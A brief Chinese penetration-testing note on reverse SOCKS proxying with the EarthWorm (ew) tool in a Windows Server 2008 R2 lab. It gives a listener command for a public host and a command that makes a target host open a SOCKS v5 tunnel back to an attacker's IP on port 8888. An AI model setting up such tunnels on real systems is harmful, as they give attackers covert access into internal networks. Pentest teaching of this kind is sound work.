渗透测试之反弹代理(ew的高级用法)反向代理

a) 先在一台具有公网 ip 的主机A上运行以下命令:   ew -s rcsocks -l 1080 -e 8888   b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口   ew.exe -s rssocks -d 攻击者ip -e 8888 实验环境:win2008r2   双网卡 IP地址 xxx.xxx.xxx.154  vmnet1是10.1.1.1
相关文章
相关标签/搜索